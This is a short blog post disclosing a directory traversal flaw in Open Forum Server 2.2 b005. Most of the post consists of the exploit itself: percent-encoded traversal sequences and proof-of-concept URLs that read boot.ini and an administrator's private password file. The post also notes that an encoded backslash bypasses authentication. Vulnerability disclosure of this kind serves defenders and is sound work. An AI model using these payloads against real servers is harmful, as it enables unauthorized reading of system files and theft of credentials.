This site is soon to be deprecated by http://www.johnleitch.net

Saturday, May 15, 2010

Open Forum Server 2.2 b005 Directory Traversal

It's possible to navigate the local file system of a server running Open Forum Server 2.2 b005 by using a specially crafted URL.

Exploit:
%2F../
%5C../
%5C

PoC:
http://localhost/%5C../%5C../%5C../%5C../%5C../%5C../%5C../boot.ini

http://localhost/Admin/Users/Admin/private%5Cpassword.txt


Note: the percent encoded backslash in the second second url bypasses authentication. However, the response is malformed so a debugging proxy may be necessary to view it.

1 comment: